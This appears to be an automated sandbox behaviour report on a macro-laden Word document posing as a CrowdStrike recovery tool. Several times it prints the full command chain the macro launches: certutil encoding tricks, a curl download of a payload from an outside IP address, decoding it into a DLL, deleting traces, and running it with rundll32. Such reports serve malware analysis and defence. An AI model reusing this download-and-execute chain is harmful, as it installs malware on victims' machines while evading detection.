Source: C:\Windows\System32\certutil.exe	Console Write: ..................................(.....(.P.....(.......................7{..............#........d..............H.(.......................(.....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8.............#........d..............H.(.....,.................(.....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..................................(.....(.P.....(........................{..............#........d..............H.(.......................(.....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................ .(.....(.P.....(........................{..............#........3).....................b.........x.......(.....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..................................(.....(.P.....(........................{..............#........3)...............(.......................(.....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8...............#.......(dF.....................*.......q(2w............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.....(........................\|..............#.......(dF.............................................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4.............#.......(dF.....................,.......................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.....(.......................'\|..............#.......(dF.............................................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................p.......(.P.....(.......................+\|..............#........3).....................b.........7.............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.....(......................./\|..............#........3).............................................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................Q.w............ .......(.P.....(.......................v~..............#.......(d..............................q(2w............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................Q.w....................(.P.....(.......................z~..............#.......(d..............................................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................x.#.............@.......(.P.....(.......................~~..............#.........#.....................n... .r.e.t.u.r.........	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................x.#.....................(.P.....(........................~..............#.........#......................... .r.................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................Q.w....................(.P.....(........................~..............#.......p.$.....................j.......................	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\xcopy.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

ReversingLabs: Detection: 26%

Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: unknown	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain

Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\System32\xcopy.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dwmapi.dll	Jump to behavior

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Source: C:\Windows\System32\rundll32.exe	Automated click: OK
Source: C:\Windows\System32\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = word/media/image1.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = word/media/image2.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = word/media/image3.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	Initial sample: OLE zip file path = docProps/custom.xml
Source: ~WRC0001.tmp.16.dr	Initial sample: OLE zip file path = word/media/image1.jpg
Source: ~WRC0001.tmp.16.dr	Initial sample: OLE zip file path = word/media/image2.jpg
Source: ~WRC0001.tmp.16.dr	Initial sample: OLE zip file path = word/media/image3.jpg
Source: ~WRC0001.tmp.16.dr	Initial sample: OLE zip file path = docProps/custom.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: ~WRC0000.tmp.16.dr	Initial sample: OLE zip file path = word/glossary/styles.xml

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\GoogleUpdater	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_BITS_3236_441263539	Jump to behavior

